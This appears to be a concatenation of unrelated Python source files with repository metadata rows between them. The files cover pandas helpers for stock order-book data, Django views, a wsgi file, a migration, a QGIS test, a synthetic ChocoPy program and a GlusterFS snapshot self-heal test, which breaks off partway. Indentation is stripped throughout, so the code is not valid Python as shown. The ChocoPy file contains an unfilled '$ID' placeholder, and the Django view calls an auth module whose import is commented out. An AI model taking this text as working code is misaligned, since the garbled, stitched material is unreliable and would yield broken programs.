# concatenates the data frames corresponding to it's part returning two dataframes.
def patches_to_frame(frame, patches, train_size):
import math
import pandas as pd
n = len(patches)
k = math.floor(n*train_size)
patches1 = patches[0:k]
patches2 = patches[k:n]
patches = [patches1, patches2]
frames = []
for j in range(2):
data_frames = []
for i in patches[j]:
data_frames.append(frame[i[1]:i[2]+1])
data = pd.concat(data_frames)
frames.append(data)
return [frames[0], frames[1]]
# The function below take a list of pats of stock files a real number p and a real number t. It randomly chooses time_id
# groups from each file corresponding approximately to r*100 percentage of total rows in the files, also it splits
# the list of groups according to t keeping a list of training groups and a list of test groups. Finally it concatenates
# all the groups from all the files returning two data frames corresponding to a training dataframe and a test
# dataframe.
def global_random_sample(file_names, percentage, train_size):
import pandas as pd
train_frames = []
test_frames = []
for filename in file_names:
i = stock_id(filename)
frame = parquet_frame(filename)
patches = file_sample(frame, percentage)
frames = patches_to_frame(frame, patches, train_size)
size = frames[0].shape[0]
column = [i] * size
frames[0]['stock_id'] = column
train_frames.append(frames[0])
size = frames[1].shape[0]
column = [i] * size
frames[1]['stock_id'] = column
test_frames.append(frames[1])
data1 = pd.concat(train_frames)
data2 = pd.concat(test_frames)
return [data1, data2]
# The following function returns a 3D as required for the keras LSTM model. We pad each time_id group with 0s
# so that the size of all groups is equal to 'groupsize'. The 'first' and 'last arguments corresponding to the first
# and last column of 'frame' that will be used as values for the LSTM model.
def lstm_input(frame, groupsize, first, last):
import numpy as np
import pandas as pd
n = frame.shape[0]
previous = 0
inpt = np.array([np.zeros((groupsize, last-first))])
for i in range(n - 1):
if not frame.loc[i].at["time_id"] == frame.loc[i + 1].at["time_id"]:
matrix = pd.DataFrame.to_numpy(frame.iloc[previous:i + 1, first:last])
pad = [[0] * (last-first)] * (groupsize - i - 1 + previous)
matrix = np.concatenate((pad, matrix), axis=0)
inpt = np.append(inpt, [matrix], axis=0)
previous = i + 1
matrix = pd.DataFrame.to_numpy(frame.iloc[previous:n, first:last])
pad = [[0] * (last-first)] * (groupsize - n + previous)
matrix = np.concatenate((pad, matrix), axis=0)
inpt = np.append(inpt, [matrix], axis=0)
inpt = np.delete(inpt, 0, axis=0)
return inpt
# The following function takes a dataframe that is a concatenation of stock dataframes and returns a subframe containing
# all rows corresponding to stock_id = sid. It is required that the initial frame has a stock_id column.
def stock_subframe(frame, sid):
import numpy as np
temp = np.array(frame['stock_id'])
temp2 = np.where(temp == sid)[0]
start = temp2[0]
end = start + len(temp2) - 1
subframe = frame.loc[start: end]
return subframe
# The following function takes a dataframe of concatenated stock dataframes and returns the list of target values
# of the corresponding (stock_id,time_id) elements.
def frame_to_values(frame, values_fr):
import numpy as np
m = values_fr.shape[0]
y = []
for i in range(m):
if i == 0:
sid = values_fr.loc[i].at["stock_id"]
subframe = stock_subframe(frame, sid)
sample_ids = subframe.loc[:, "time_id"]
sample_ids = set(sample_ids)
elif not values_fr.loc[i].at["stock_id"] == values_fr.loc[i-1].at["stock_id"]:
sid = values_fr.loc[i].at["stock_id"]
subframe = stock_subframe(frame, sid)
sample_ids = subframe.loc[:, "time_id"]
sample_ids = set(sample_ids)
if values_fr.loc[i].at["time_id"] in sample_ids:
y.append(values_fr.loc[i].at["target"])
y = np.array(y)
return y
# In the following function filename1 corresponds to the path of a file that is a random sample of some book-stock_id
# file and filename2 is the path of the corresponding trade-stock_id file. It returns the random sample of filename2
# that contains the time_id-groups as filename2
def counterpart_file(filename1, filename2):
import pandas as pd
frame2 = parquet_frame(filename2)
frame1 = csv_frame(filename1)
sid = stock_id(filename2)
subframe = stock_subframe(frame1, sid)
sample_ids = subframe.loc[:, "time_id"]
sample_ids = set(sample_ids)
frames = []
previous = 0
n = frame2.shape[0]
for i in range(n):
if i == n - 1:
if frame2.loc[i].at["time_id"] in sample_ids:
subframe = frame2.loc[previous + 1:n - 1]
frames.append(subframe)
previous = i
elif not frame2.loc[i + 1].at["time_id"] == frame2.loc[i].at["time_id"]:
if frame2.loc[i].at["time_id"] in sample_ids:
subframe = frame2.loc[previous + 1:i]
frames.append(subframe)
previous = i
result = pd.concat(frames)
return result
# The following function takes a range of rows of a dataframe and returns a row with statistical information
# of that range of rows
def stat_contraction(frame, start, end):
import numpy as np
import math
column_lists = []
for j in frame.columns[2:]:
column_lists.append(np.array(frame[j][start:end]))
values = [frame.loc[start].at["time_id"]]
for j in column_lists:
values.append(np.max(j))
values.append(np.min(j))
values.append(np.sum(j) / len(j))
values.append(math.sqrt(np.var(j)))
values = np.array(values)
values = values.reshape((1, len(values)))
return values
# The following function takes a stock dataframe and returns the dataframe formed after replacing each time_id-groups
# with a row containing statistical information about it.
def contracted_frame(frame):
import numpy as np
import pandas as pd
import math
new_columns = ['time_id', 'bid_price1_max', 'bid_price1_min', 'bid_price1_av', 'bid_price1_sd', 'ask_price1_max',
'ask_price1_min', 'ask_price1_av', 'ask_price1_sd', 'bid_price2_max', 'bid_price2_min',
'bid_price2_av', 'bid_price2_sd', 'ask_price2_max', 'ask_price2_min', 'ask_price2_av',
'ask_price2_sd', 'bid_size1_max', 'bid_size1_min', 'bid_size1_av', 'bid_size1_sd', 'ask_size1_max',
'ask_size1_min', 'ask_size1_av', 'ask_size1_sd', 'bid_size2_max', 'bid_size2_min', 'bid_size2_av',
'bid_size2_sd', 'ask_size2_max', 'ask_size2_min', 'ask_size2_av', 'ask_size2_sd']
contracted = pd.DataFrame(columns=new_columns)
previous = 0
n = frame.shape[0]
for i in range(n - 1):
if not frame.loc[i].at["time_id"] == frame.loc[i + 1].at["time_id"]:
values = stat_contraction(frame, previous+1, i)
temp = pd.DataFrame(values, columns=new_columns)
contracted = pd.concat([contracted, temp])
previous = i
if i+1 == n-1:
values = stat_contraction(frame, previous+1, i+1)
temp = pd.DataFrame(values, columns=new_columns)
contracted = pd.concat([contracted, temp])
previous = i
return contracted
| [
"noreply@github.com"
] | jingmouren.noreply@github.com |
61036e432e537abc60826c8d95716e236963ba2d | 5a02333b618fa23883e3dd31829a11c6e0395a6a | /engine/views (copy).py | a56007b0d61e2ce1665afba06188bdc22f34d9e0 | [] | no_license | Trizalio/BaseProject | c3fa97f213cd4db69c2837cf88c47dedc81fa551 | 05035c89363119918f95433c8defa982de509015 | refs/heads/master | 2020-04-06T04:30:39.007815 | 2014-09-05T15:45:26 | 2014-09-05T15:45:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect, HttpResponse
import datetime
from django.contrib.auth.forms import UserCreationForm
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.core.context_processors import csrf
#from django.contrib import auth
from django.contrib.auth import authenticate, login
def home(request, str1 = 'anonim'):
context = {}
if request.user.is_authenticated():
# context['anonim'] = True
# context.update(csrf(request))
context['curusername'] = '123'#request.user.username
return render_to_response('News.html', context)
else:
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
context['curusername'] = request.user.username
context['loginsuccess'] = True
return render_to_response('News.html', context)
else:
context['logindisabled'] = True
context.update(csrf(request))
return render_to_response('NewsExample.html', context)
else:
context['loginfault'] = True
context.update(csrf(request))
return render_to_response('NewsExample.html', context)
else:
context.update(csrf(request))
return render_to_response('NewsExample.html', context)
def logout(request):
auth.logout(request)
return HttpResponseRedirect('/')
#
#
#
#def my_view(request):
# username = request.POST['username']
# password = request.POST['password']
# user = authenticate(username=username, password=password)
# if user is not None:
# if user.is_active:
# login(request, user)
# # Redirect to a success page.
# else:
# # Return a 'disabled account' error message
# else:
# # Return an 'invalid login' error message.
| [
"gifla@ya.ru"
] | gifla@ya.ru |
5d54d6dc6544b926996fb5332cc815d1578decd3 | fca1056e9df9fbf13e92379f8f329cda27faa3ce | /DRAF/DRAF/wsgi.py | b1a3338daf964956f6d942d419a65c94e9ba48c4 | [] | no_license | SolderingKnowledge/Rest-API | 5fc1adf1fb5006e02c7e508bf7ea909bfb74159a | a5bbb47c15dda5d78c515a68fab58ff87f37dbca | refs/heads/master | 2020-03-25T17:18:24.738941 | 2019-06-20T23:54:41 | 2019-06-20T23:54:41 | 143,972,369 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for DRAF project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "DRAF.settings")
application = get_wsgi_application()
| [
"noreply@github.com"
] | SolderingKnowledge.noreply@github.com |
e9e780c6a50efbd1bc3f389464d332f7649b4dec | 7780fe9c17110df4cde526f2f32b48739b46d801 | /tests/utils_test.py | a76cee2c3223ae7873aaa13dbc4a87bed82ef738 | [] | no_license | rduivenvoorde/xytools | 59c2d38a2994a63964219a951838611bab180265 | 1a8184409efb6eb7074f38b6d4f0623e01afaed0 | refs/heads/master | 2020-12-15T02:45:50.027364 | 2016-10-02T15:55:15 | 2016-10-02T15:55:15 | 7,837,390 | 4 | 3 | null | 2016-09-25T10:11:39 | 2013-01-26T12:23:46 | Python | UTF-8 | Python | false | false | 756 | py | '''
Created on 13/12/2013
@author: victorzinho
'''
import unittest
import utils
from qgis.core import QGis
from mock import Mock
class Test(unittest.TestCase):
def testGetFieldNames(self):
originalNames = ['ID', 'NAME']
field0 = self._mockField(originalNames[0])
field1 = self._mockField(originalNames[1])
fields = [field0, field1]
layer = Mock()
layer.dataProvider().fields.return_value = fields
fieldNames = utils.fieldNames(layer)
assert fieldNames == originalNames
def _mockField(self, name):
field = Mock()
field.name.return_value = name
return field
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"victor.gonzalez@geomati.co"
] | victor.gonzalez@geomati.co |
cbe5f43ddfbfbe7b436a28d4810339b2291dcf95 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/coverage-big-1706.py | e71fa3edcf5b892e227597f755678d3066f64bc5 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,349 | py | count:int = 0
count2:int = 0
count3:int = 0
count4:int = 0
count5:int = 0
def foo(s: str) -> int:
return len(s)
def foo2(s: str, s2: str) -> int:
return len(s)
def foo3(s: str, s2: str, s3: str) -> int:
return len(s)
def foo4(s: str, s2: str, s3: str, s4: str) -> int:
return len(s)
def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int:
return len(s)
class bar(object):
p: bool = True
def baz(self:"bar", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar2(object):
p: bool = True
p2: bool = True
def baz(self:"bar2", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar2", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar3(object):
p: bool = True
p2: bool = True
p3: bool = True
def baz(self:"bar3", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar3", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal $ID
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar4(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
def baz(self:"bar4", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar4", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar5(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
p5: bool = True
def baz(self:"bar5", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar5", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
x5:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
y5:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
nonlocal x5
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
print(bar().baz([1,2]))
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
0eafa771e434cc47da07d9832275df08bc7e0215 | ccd27037d13c0288aae5d94e616c659ce2a713a0 | /donor/migrations/0001_initial.py | b2964b3233b6f9785178e02fc623f4e664a5e3c9 | [] | no_license | AniketShahane/ZeroDay-01 | 99ce4dad366b778851518a07a34ab9d100246ed5 | 2a12c6965fdbc9c1f1db3d2f207861a7ddcb62e8 | refs/heads/master | 2020-04-21T11:14:03.077996 | 2019-02-11T13:21:31 | 2019-02-11T13:21:31 | 169,516,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,907 | py | # Generated by Django 2.1.5 on 2019-02-06 08:07
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Donor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('area', models.CharField(max_length=250)),
('amount', models.IntegerField()),
('time', models.DateTimeField(verbose_name=datetime.datetime(2019, 2, 6, 8, 7, 30, 318661, tzinfo=utc))),
],
),
migrations.CreateModel(
name='RevenueAdded',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('principal_amount', models.IntegerField()),
('time', models.DateTimeField(verbose_name=datetime.datetime(2019, 2, 6, 8, 7, 30, 324627, tzinfo=utc))),
('donor_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='donor.Donor')),
],
),
migrations.CreateModel(
name='RevenueSpent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('principal_amount', models.IntegerField()),
('resource', models.CharField(choices=[('SCH', 'Scholarships'), ('ST', 'Stationery'), ('ACC', 'Accommodation'), ('HC', 'Health Care')], max_length=255)),
('time', models.DateTimeField(verbose_name=datetime.datetime(2019, 2, 6, 8, 7, 30, 325058, tzinfo=utc))),
],
),
]
| [
"shahaneaniket11@gmail.com"
] | shahaneaniket11@gmail.com |
467e02fac1ee0a2d0adf38f1a86fe51efd1d8f05 | 49e09da220cbfa3304b79dc2c3ae59dbc3b0f50c | /tests/functional/snapshot/test_snap_self_heal.py | 10f8a531a8ce6edf00ef90f299ea932e2a6714fb | [] | no_license | hellohaihai/glusto-tests | 8e9ef796b5d95cd30dd619606ca07101f91bc8af | c04c4a6507df415f1a337c79e357f26fa93e5308 | refs/heads/master | 2020-05-26T07:11:19.615145 | 2019-05-10T07:33:52 | 2019-05-10T07:33:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,417 | py | # Copyright (C) 2017-2018 Red Hat, Inc. <http://www.redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
Description:
Test Cases in this module tests the
Creation of clone from snapshot of volume.
"""
from glusto.core import Glusto as g
from glustolibs.gluster.exceptions import ExecutionError
from glustolibs.gluster.gluster_base_class import GlusterBaseClass, runs_on
from glustolibs.gluster.mount_ops import (mount_volume, umount_volume,
is_mounted)
from glustolibs.gluster.volume_ops import volume_start
from glustolibs.gluster.brick_libs import (
get_all_bricks, are_bricks_online, bring_bricks_offline,
select_bricks_to_bring_offline,
get_offline_bricks_list, get_online_bricks_list, bring_bricks_online)
from glustolibs.gluster.heal_libs import monitor_heal_completion
from glustolibs.gluster.volume_libs import (
cleanup_volume,
get_subvols,
verify_all_process_of_volume_are_online,
wait_for_volume_process_to_be_online)
from glustolibs.gluster.snap_ops import (snap_create,
snap_list,
snap_activate,
snap_clone)
from glustolibs.misc.misc_libs import upload_scripts
@runs_on([['distributed-replicated'],
['glusterfs']])
class SnapshotSelfheal(GlusterBaseClass):
@classmethod
def setUpClass(cls):
GlusterBaseClass.setUpClass.im_func(cls)
cls.snap = "snap1"
cls.clone = "clone1"
cls.mount1 = "/mnt/clone1"
def setUp(self):
# Uploading file_dir script in all client direcotries
g.log.info("Upload io scripts to clients %s for running IO on "
"mounts", self.clients[0])
script_local_path = ("/usr/share/glustolibs/io/scripts/"
"file_dir_ops.py")
self.script_upload_path = ("/usr/share/glustolibs/io/scripts/"
"file_dir_ops.py")
ret = upload_scripts(self.clients[0], script_local_path)
if not ret:
raise ExecutionError("Failed to upload IO scripts to clients %s" %
self.clients[0])
g.log.info("Successfully uploaded IO scripts to clients %s",
self.clients[0])
# SettingUp volume and Mounting the volume
GlusterBaseClass.setUp.im_func(self)
g.log.info("Starting to SetUp Volume")
ret = self.setup_volume_and_mount_volume(mounts=self.mounts)
if not ret:
raise ExecutionError("Failed to setup volume %s" % self.volname)
g.log.info("Volume %s has been setup successfully", self.volname)
def test_snap_self_heal(self):
"""
Steps:
1. create a volume
2. mount volume
3. create snapshot of that volume
4. Activate snapshot
5. Clone snapshot and Mount
6. Perform I/O
7. Bring Down Few bricks from volume without
affecting the volume or cluster.
8. Perform I/O
9. Bring back down bricks to online
10. Validate heal is complete with areequal
"""
# pylint: disable=too-many-statements, too-many-locals
# Creating snapshot:
g.log.info("Starting to Create snapshot")
ret, _, _ = snap_create(self.mnode, self.volname, self.snap)
self.assertEqual(ret, 0, ("Failed to create snapshot for volume %s"
% self.volname))
g.log.info("Snapshot %s created successfully for volume %s", self.snap,
self.volname)
# Activating snapshot
g.log.info("Starting to Activate Snapshot")
ret, _, _ = snap_activate(self.mnode, self.snap)
self.assertEqual(ret, 0, ("Failed to Activate snapshot %s"
% self.snap))
g.log.info("Snapshot %s activated successfully", self.snap)
# snapshot list
ret, _, _ = snap_list(self.mnode)
self.assertEqual(ret, 0, ("Failed to list all the snapshot"))
g.log.info("Snapshot list command was successful")
# Creating a Clone volume from snapshot:
g.log.info("Starting to Clone volume from Snapshot")
ret, _, _ = snap_clone(self.mnode, self.snap, self.clone)
self.assertEqual(ret, 0, ("Failed to clone %s from snapshot %s"
% (self.clone, self.snap)))
g.log.info("%s created successfully", self.clone)
# start clone volumes
g.log.info("start to created clone volumes")
ret, _, _ = volume_start(self.mnode, self.clone)
self.assertEqual(ret, 0, "Failed to start clone %s" % self.clone)
g.log.info("clone volume %s started successfully", self.clone)
# Mounting a clone volume
g.log.info("Mounting a clone volume")
ret, _, _ = mount_volume(self.clone, self.mount_type, self.mount1,
self.mnode, self.clients[0])
self.assertEqual(ret, 0, "Failed to mount clone Volume %s"
% self.clone)
g.log.info("Clone volume %s mounted Successfully", self.clone)
# Checking cloned volume mounted or not
ret = is_mounted(self.clone, self.mount1, self.mnode,
self.clients[0], self.mount_type)
self.assertTrue(ret, "Failed to mount clone volume on mount point: %s"
% self.mount1)
g.log.info("clone Volume %s mounted on %s", self.clone, self.mount1)
# write files on all mounts
g.log.info("Starting IO on all mounts...")
g.log.info("mounts: %s", self.mount1)
all_mounts_procs = []
cmd = ("python %s create_files "
"-f 10 --base-file-name file %s"
% (self.script_upload_path, self.mount1))
proc = g.run(self.clients[0], cmd)
all_mounts_procs.append(proc)
g.log.info("Successful in creating I/O on mounts")
# get the bricks from the volume
g.log.info("Fetching bricks for the volume : %s", self.clone)
bricks_list = get_all_bricks(self.mnode, self.clone)
g.log.info("Brick List : %s", bricks_list)
# Select bricks to bring offline
g.log.info("Starting to bring bricks to offline")
bricks_to_bring_offline_dict = (select_bricks_to_bring_offline(
self.mnode, self.volname))
bricks_to_bring_offline = filter(None, (
bricks_to_bring_offline_dict['hot_tier_bricks'] +
bricks_to_bring_offline_dict['cold_tier_bricks'] +
bricks_to_bring_offline_dict['volume_bricks']))
g.log.info("Brick to bring offline: %s ", bricks_to_bring_offline)
ret = bring_bricks_offline(self.clone, bricks_to_bring_offline)
self.assertTrue(ret, "Failed to bring the bricks offline")
g.log.info("Successful in bringing bricks: %s offline",
bricks_to_bring_offline)
# Offline Bricks list
offline_bricks = get_offline_bricks_list(self.mnode, self.clone)
self.assertIsNotNone(offline_bricks, "Failed to get offline bricklist"
"for volume %s" % self.clone)
for bricks in offline_bricks:
self.assertIn(bricks, bricks_to_bring_offline,
"Failed to validate "
"Bricks offline")
g.log.info("Bricks Offline: %s", offline_bricks)
# Online Bricks list
online_bricks = get_online_bricks_list(self.mnode, self.clone)
self.assertIsNotNone(online_bricks, "Failed to get online bricks"
" for volume %s" % self.clone)
g.log.info("Bricks Online: %s", online_bricks)
# write files mountpoint
g.log.info("Starting IO on all mounts...")
g.log.info("mounts: %s", self.mount1)
all_mounts_procs = []
cmd = ("python %s create_files "
"-f 10 --base-file-name file %s" % (self.script_upload_path,
self.mount1))
proc = g.run(self.clients[0], cmd)
all_mounts_procs.append(proc)
g.log.info("Successful in creating I/O on mounts")
# Bring all bricks online
g.log.info("bring all bricks online")
ret = bring_bricks_online(self.mnode, self.clone,
bricks_to_bring_offline)
self.assertTrue(ret, "Failed to bring bricks online")
g.log.info("Successful in bringing all bricks online")
# Validate Bricks are online
g.log.info("Validating all bricks are online")
ret = are_bricks_online(self.mnode, self.clone, bricks_list)
self.assertTrue(ret, "Failed to bring all the bricks online")
g.log.info("bricks online: %s", bricks_list)
# Wait for volume processes to be online
g.log.info("Wait for volume processes to be online")
ret = wait_for_volume_process_to_be_online(self.mnode, self.clone)
self.assertTrue(ret, ("Failed to wait for volume %s processes to "
"be online" % self.clone))
g.log.info("Successful in waiting for volume %s processes to be "
"online", self.clone)
# Verify volume's all process are online
g.log.info("Verifying volume's all process are online")
ret = verify_all_process_of_volume_are_online(self.mnode, self.clone)
self.assertTrue(ret, ("Volume %s : All process are not online"
% self.clone))
